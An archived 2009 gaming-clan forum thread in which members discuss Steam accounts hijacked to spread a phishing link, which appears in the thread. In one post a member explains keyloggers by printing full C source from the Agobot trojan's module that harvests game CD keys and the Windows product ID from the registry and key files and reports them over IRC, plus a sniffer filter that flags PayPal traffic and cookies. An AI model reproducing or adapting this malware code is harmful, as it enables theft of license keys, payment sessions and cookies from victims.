PDA

View Full Version : Dot's account is comprimised



siosios
09-19-2009, 03:51 PM
do not click the link he sends you

Never tell your password to anyone.
Saturday, September 19, 2009
4:48 PM - Dot. [ŋḮ] The steam is proud to present free games for steam
xxxx://valvegamingsteam.t35.xxxx/
4:49 PM - |Ň/Ú| siosios: nice.... why dont you give the account back to its owner dick head
Dot. [ŋḮ] is now Offline.
Dot. [ŋḮ] is now Online.
4:52 PM - |Ň/Ú| siosios: dot?
4:53 PM - |Ň/Ú| siosios: welp if this is still the phishing prick i guess i can waste my time and hack that retarded web account and warn people of what your doing
Dot. [ŋḮ] is now Offline.

siosios

AwpsandKnives
09-19-2009, 03:52 PM
I got the same, def hacked, poor dot ...

<JohnnyBoy>
09-19-2009, 03:54 PM
This really sucks how did you get hack dude?

enderless
09-19-2009, 03:58 PM
Dammit sio you are fast =P

siosios
09-19-2009, 04:00 PM
only the fast can keep up with what i do.

<JohnnyBoy>
09-19-2009, 04:17 PM
dot, dvxAznSensationxvb,
arabdriftr got hacked and i'm thinking its not over
(http://valvegamingsteam.t35.com/)

TiberianSun
09-19-2009, 04:21 PM
dot, dvxAznSensationxvb,
arabdriftr got hacked and i'm thinking its not over
(http://valvegamingsteam.t35.com/)

yeah, who knows maybe your next :) :P

enderless
09-19-2009, 04:39 PM
only the fast can keep up with what i do.

ha! beat me by 4 minutes

Jackd
09-19-2009, 04:43 PM
fast is good for some things :D

siosios
09-19-2009, 04:52 PM
jack temp remove dots admin and access to the moderators of the forums and ban website please

Jackd
09-19-2009, 04:59 PM
Done already!


jack temp remove dots admin and access to the moderators of the forums and ban website please

<JohnnyBoy>
09-19-2009, 05:02 PM
yeah, who knows maybe your next :) :P

I hope so caUse i try so many times AND THEY CANT HACK ME!

siosios
09-19-2009, 06:12 PM
Done already!

thank you

dvxAznSensationxvb
09-19-2009, 07:00 PM
dam any way to contact dot then? errr i steam takes half a day to even talk back................. they better be making half life 3 rather than helping ppl who got hacked or theres someone to kill for it............

SmurfSniper
09-19-2009, 09:03 PM
hes on xfire and Im sure he probably already knows.... when it gets hacked it will not let you sign in on your computer.... at least thats how it done mine

DoT
09-19-2009, 10:15 PM
just came back from a good day out and find out my accnt is hacked -__-
hitting up valve in a sec.
smoke break to relieve the shock first.

its weird though...i didnt click a link NOR type my info anywhere. i got a message from silence but just closed it and told you guys here.

-_-

fuck you need purchase info :/ this will take longer than i thought.
would prolly be safest to take me off steam friends if you havent done so already

Natalya
09-19-2009, 10:43 PM
How did someone hack him without phishing?

Guitar Guy
09-19-2009, 11:56 PM
How did someone hack him without phishing?
Exactly, thats what I was wondering.
1 of three ways Dot's password was stolen.

1, would be brute force (HIGHLY UNLIKELY unless his password is 123)
2, would be keylogger.
3, would be phishing

But keyloggers dont just appear from a message. Trust me, Ive made keyloggers before. They dont just appear from no where. Some code has to be executed for a keylogger to get on your computer, and a message doesnt cut it. Dot didnt enter any info, so phising is out of the question. Brute force would take a couple thousand years, So wtf?

warlord4650
09-20-2009, 01:10 AM
cunts aren't touching my account..

<JohnnyBoy>
09-20-2009, 01:24 AM
I'm guessing the hacker is really pro and know what he's doing so anyone of us could be next! =D Be on your guards people and don't click on *ANY* websites that says FREE STEAM GAMES ever!

Natalya
09-20-2009, 02:19 AM
If you make a 50 digit password, brute force would not be able to solve it in ten times the age of the universe even if all the matter in the universe was used to build a giant computer specifically for the purpose of cracking it.

ORGANDONOR
09-20-2009, 06:30 AM
i got my 4 dig hacked like a year ago by just adding someone to me steam friends i dont know how they did it though i was pissed as hell

siosios
09-20-2009, 07:33 AM
some homemade viruses have built in key loggers and search the registry for game keys. if they find bank info or a game key they report it via irc to the owner of the virus.

example virus's that do this are the old and outdated agobot or the sdbot so on so forth.

here is the ago bots game key search code:



#include "main.h"
#include "mainctrl.h"
#include "harvest_cdkeys.h"
#ifdef WIN32
struct items
{
char *GameName;
HKEY RootKey;
char *SubKey;
char *ValueName;
};
#define MAX_KEY_LENGTH 2048
#define MAX_VALUE_NAME 16383
/* Leet cdkey code by thegeek:)
* CDKey List, With GameNames and Registry Entries £
* Here Is Where You Would Add New Games If You Wanted Too
* TODO: add support for getting from files.
*/
items CDKeyList[] =
{
{ "[Windows Product ID: ", HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", "ProductID" },
{ "[Battlefield 1942: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942\\ergc", "" },
{ "[Battlefield 1942: Secret Weapons Of WWII: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 Secret Weapons of WWII\\ergc", "" },
{ "[Battlefield 1942: The Road To Rome: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 The Road to Rome\\ergc", "" },
{ "[Battlefield 1942: Vietnam:", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield Vietnam\\ergc", "" },
{ "[Black and White: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Black and White\\ergc", "" },
{ "[Command and Conquer: Generals: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Generals\\ergc", "" },
{ "[Command and Conquer: Generals: Zero Hour: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Command and Conquer Generals Zero Hour\\ergc", "" },
{ "[Command and Conquer: Red Alert2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Red Alert 2", "Serial" },
{ "[Command and Conquer: Tiberian Sun: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Tiberian Sun", "Serial" },
{ "[Counter-Strike: ", HKEY_CURRENT_USER, "Software\\Valve\\CounterStrike\\Settings", "Key" },
{ "[FIFA 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2002\\ergc", "" },
{ "[FIFA 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2003\\ergc", "" },
{ "[Freedom Force: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Distribution\\Freedom Force\\ergc", "" },
{ "[Global Operations: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Global Operations\\ergc", "" },
{ "[Gunman Chronicles: ", HKEY_CURRENT_USER, "Software\\Valve\\Gunman\\Settings", "Key" },
{ "[Half-Life: ", HKEY_CURRENT_USER, "Software\\Valve\\Half-Life\\Settings", "Key" },
{ "[Hidden and Dangerous 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Illusion Softworks\\Hidden & Dangerous 2", "key" },
{ "[IGI2: Covert Strike: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\IGI 2 Retail\\CDKey", "CDkey" },
{ "[Industry Giant 2: ", HKEY_CURRENT_USER, "Software\\JoWooD\\InstalledGames\\IG2", "prvkey" },
{ "[James Bond 007: Nightfire: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\James Bond 007 Nightfire\\ergc", "" },
{ "[Medal of Honor: Allied Assault: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault\\ergc", "" },
{ "[Medal of Honor: Allied Assault: Breakthrough ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Breakthrough\\ergc", "" },
{ "[Medal of Honor: Allied Assault: Spearhead ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Spearhead\\ergc", "" },
{ "[Nascar Racing 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2002\\ergc", "" },
{ "[Nascar Racing 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2003\\ergc", "" },
{ "[NHL 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2002\\ergc", "" },
{ "[NHL 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2003\\ergc", "" },
{ "[Need For Speed: Hot Pursuit 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Hot Pursuit 2\\ergc", "" },
{ "[Need For Speed: Underground: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Underground\\ergc", "" },
{ "[Neverwinter Nights: ", HKEY_LOCAL_MACHINE, "Software\\BioWare\\NWN\\Neverwinter","Key" },
{ "[Ravenshield: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Red Storm Entertainment\\RAVENSHIELD", ""},
{ "[Shogun: Total War: Warlord Edition: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Shogun Total War - Warlord Edition\\ergc", "" },
{ "[Soldiers Of Anarchy: ", HKEY_CURRENT_USER, "Software\\Silver Style Entertainment\\Soldiers Of Anarchy\\Settings", "CDKey" },
{ "[Soldier Of Fortune 2: ",HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", "sof2key" },
{ "[The Gladiators: ", HKEY_CURRENT_USER, "Software\\Eugen Systems\\The Gladiators", "RegNumber" },
{ "[Unreal Tournament 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2003", "CDKey" },
{ "[Unreal Tournament 2004: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2004", "CDKey" },

};
#endif // WIN32
char szKey[1024];
char *szLogText;
/*
================================================== ================================================== ===================
================================================== ================================================== ===================
*/
void CHarvest_CDKeys::Init(void)
{
REGCMD(m_cmdCDKeys, "harvest.cdkeys", "makes the bot get a list of cdkeys", false, this);
}
/*
================================================== ================================================== ===================
================================================== ================================================== ===================
*/
bool CHarvest_CDKeys::HandleCommand(CMessage *pMsg)
{
#ifdef WIN32
if(!pMsg->sCmd.Compare("harvest.cdkeys"))
{
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#define arraysize(x) (sizeof(x) / sizeof(x[0]))
DWORD dwSize = 2048;
unsigned char szBuffer[2048];
int i=0;
char *UserKey = (char *) malloc(128);
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
szLogText = new char[2048];
memset(szLogText, 0, 2048);
if (!g_pMainCtrl->m_cBot.cdkey_windows.bValue){
i=1;}
for(i;i < arraysize(CDKeyList); i++)
{

if(CDKeyList[i].RootKey != HKEY_CURRENT_USER)
{
/*~~~~~~~~~~~~~~*/
HKEY rk = NULL;
/*~~~~~~~~~~~~~~*/
sprintf(UserKey, "%s", CDKeyList[i].SubKey);
memset(szBuffer, 0, sizeof(szBuffer));
memset(szKey, 0, sizeof(szKey));
memset(szLogText, 0, sizeof(szLogText));
if(RegOpenKeyEx(CDKeyList[i].RootKey, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
{
}
if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) != ERROR_SUCCESS)
{
}
if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) == ERROR_SUCCESS)
{
g_pMainCtrl->m_cIRC.SendFormat
(
pMsg->bSilent,
pMsg->bNotice,
pMsg->sReplyTo.Str(),
"%s%s]\n",
CDKeyList[i].GameName,
szBuffer
);
}
RegCloseKey(rk);
/*
* strcat(szLogText, rKeyString); £
* ReadKey(szKey, CDKeyList[i].GameName, CDKeyList[i].RootKey,CDKeyList[i].SubKey,
* CDKeyList[i].ValueName, dwSize, szBuffer);
* g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
* pMsg->sReplyTo.Str(), szKey);
*/
}
if(CDKeyList[i].RootKey == HKEY_CURRENT_USER)
{
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
CHAR achKey[2048]; /* buffer for subkey name */
DWORD cbName; /* size of name string */
CHAR achClass[MAX_PATH] = ""; /* buffer for class name */
DWORD cchClassName = MAX_PATH; /* size of class string */
DWORD cSubKeys = 0; /* number of subkeys */
DWORD cbMaxSubKey; /* longest subkey size */
DWORD cchMaxClass; /* longest class string */
DWORD cValues; /* number of values for key */
DWORD cchMaxValue; /* longest value name */
DWORD cbMaxValueData; /* longest value data */
DWORD cbSecurityDescriptor; /* size of security descriptor */
FILETIME ftLastWriteTime; /* last write time */
DWORD retCode;
int u;
CHAR achValue[MAX_VALUE_NAME];
DWORD cchValue = MAX_VALUE_NAME;
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*
* g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
* pMsg->sReplyTo.Str(), CDKeyList[i].GameName); £
* Get the class name and the value count.
*/
retCode = RegQueryInfoKey
(
CDKeyList[i].RootKey, /* key handle */
achClass, /* buffer for class name */
&cchClassName, /* size of class string */
NULL, /* reserved */
&cSubKeys, /* number of subkeys */
&cbMaxSubKey, /* longest subkey size */
&cchMaxClass, /* longest class string */
&cValues, /* number of values for this key */
&cchMaxValue, /* longest value name */
&cbMaxValueData, /* longest value data */
&cbSecurityDescriptor, /* security descriptor */
&ftLastWriteTime /* last write time */
);
/* Enumerate the subkeys, until RegEnumKeyEx fails. */
if(cSubKeys)
{
for(u = 0; u < cSubKeys; u++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(HKEY_USERS, u, achKey, &cbName, NULL, NULL, NULL, &ftLastWriteTime);
if(retCode == ERROR_SUCCESS)
{
/*~~~~~~~~~~~~~~*/
HKEY rk = NULL;
/*~~~~~~~~~~~~~~*/
sprintf(UserKey, "%s\\%s", achKey, CDKeyList[i].SubKey);
memset(szBuffer, 0, sizeof(szBuffer));
memset(szKey, 0, sizeof(szKey));
if(RegOpenKeyEx(HKEY_USERS, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
{
}
if
(
RegQueryValueEx
(
rk,
CDKeyList[i].ValueName,
NULL,
NULL,
szBuffer,
&dwSize
) != ERROR_SUCCESS
)
{
RegCloseKey(rk);
}
if
(
RegQueryValueEx
(
rk,
CDKeyList[i].ValueName,
NULL,
NULL,
szBuffer,
&dwSize
) == ERROR_SUCCESS
)
{
g_pMainCtrl->m_cIRC.SendFormat
(
pMsg->bSilent,
pMsg->bNotice,
pMsg->sReplyTo.Str(),
"%s%s]\n",
CDKeyList[i].GameName,
szBuffer
);
}
RegCloseKey(rk);
}
}
}
}
}


HKEY hkey=NULL; unsigned char szDataBuf[128]; unsigned char szDataBuf2[1024]; char line[100];
dwSize = 128; LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
{ char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
sprintf(szPath, "%s\\base\\mp\\%s", szDataBuf2, "sof2key");
if((fp=fopen(szPath,"r"))!=NULL)
{ if(fgets(line, 100, fp))
if(!strstr(line, "mtkwftmkemfew3p3b7"))
{ g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found SOF2 CDKey (%s).", line); }
fclose(fp); }
if(szPath) free(szPath); }
RegCloseKey(hkey);
/*
Call of Duty
*/
// Warezed: TSH3XSWTYPWGUUTXE660
dwSize = 128; lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Call of Duty", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
{ char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
sprintf(szPath, "%s\\main\\%s", szDataBuf2, "codkey");
if((fp=fopen(szPath,"r"))!=NULL)
{ if(fgets(line, 100, fp))
if(!strstr(line, "TSH3XSWTYPWGUUTXE660"))
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found COD CDKey (%s).", line);
fclose(fp); }
if(szPath) free(szPath); }
RegCloseKey(hkey);



return true;
}
#endif // WIN32
return false;
}


One part of the sniffer code (this one looks for paypal):



// Like paypals? ;-D How about cookies? YUMMEH! -rain
bool IsSuspiciousHTTP(const char *szBuf) {
if(strstr(szBuf, "HTTP sniff")) return false;
if(strstr(szBuf, g_pMainCtrl->m_sUserName.CStr())) return false;
if(strstr(szBuf, g_pMainCtrl->m_cBot.si_mainchan.sValue.CStr())) return false;
if(strstr(szBuf, "paypal")) return true;
if(strstr(szBuf, "PAYPAL")) return true;
if(strstr(szBuf, "PAYPAL.COM")) return true;
if(strstr(szBuf, "paypal.com")) return true;
if(strstr(szBuf, "Set-Cookie:")) return true;
return false; }


im sure the newer trojans out there are more advanced but this is how they can get your info also.

dvxAznSensationxvb
09-20-2009, 08:09 AM
so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order

Jackd
09-20-2009, 08:20 AM
Whats your steam ID?


so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order

dvxAznSensationxvb
09-20-2009, 01:45 PM
Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

DoT
09-20-2009, 01:48 PM
Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

yupp
and he deleted our whole friends list.
but he hasnt changed my accnt info which has n/us site and group info on it so be careful guys

Jackd
09-20-2009, 01:59 PM
Steam ID is invalid.


Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

DoT
09-20-2009, 02:16 PM
Sent my shit in to valve, hopefully this turns back soon.

dvxAznSensationxvb
09-20-2009, 02:40 PM
This is awful..... I'm here and oneforty is outranking me as we speak!!!!! Dam and everyone is probably worried sick like drank and aim and sky and nat and Nadia and especially army :-/

Guitar Guy
09-20-2009, 04:19 PM
This is awful..... I'm here and oneforty is outranking me as we speak!!!!! Dam and everyone is probably worried sick like drank and aim and sky and nat and Nadia and especially army :-/

AND MEEEEE

Dont worry though, im army's temporary bitch till you get back

dvxAznSensationxvb
09-20-2009, 06:49 PM
lol wateva XD yur not enough to satisfy army................ although im not saying i am either............. oh shit how do i get out of this one -_-'